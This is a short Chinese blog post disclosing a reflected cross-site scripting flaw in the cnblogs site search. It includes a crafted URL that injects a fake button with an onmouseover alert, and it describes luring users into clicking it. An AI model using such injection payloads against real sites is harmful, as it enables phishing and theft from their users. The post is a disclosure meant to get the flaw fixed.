找找看XSS漏洞!!!

跨站式脚本攻击(XSS)被评为07年排名第一的Web安全漏洞,拿“找找看”试了一把,发现存在漏洞,希望管理员尽快改掉

XSS示例 :

诱骗别人点击地址:

 http://zzk.cnblogs.com/s?w=cnblogs%22%2F%3E+%3Cinput+type%3D%22submit%22+class%3D%22btnSearch%22+onmouseover%3Djavascript%3Aalert%28%27YouAreHacked%21%27%29++value%3D%22%E9%A2%86%E5%8F%96%E7%A7%AF%E5%88%86&t=

别人粗一看,是博客园的找找看,放心大胆的进来了,结果:

[温馨提示]:该文章由原博客园导入而来,如排版效果不佳,请移步:http://www.cnblogs.com/coderzh/archive/2008/08/05/1261058.html

微信扫一扫交流

作者:CoderZh
微信关注:hacker-thinking (一个程序员的思考)
本文出处:https://blog.coderzh.com/2008/08/05/1261058/
文章版权归本人所有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接,否则保留追究法律责任的权利。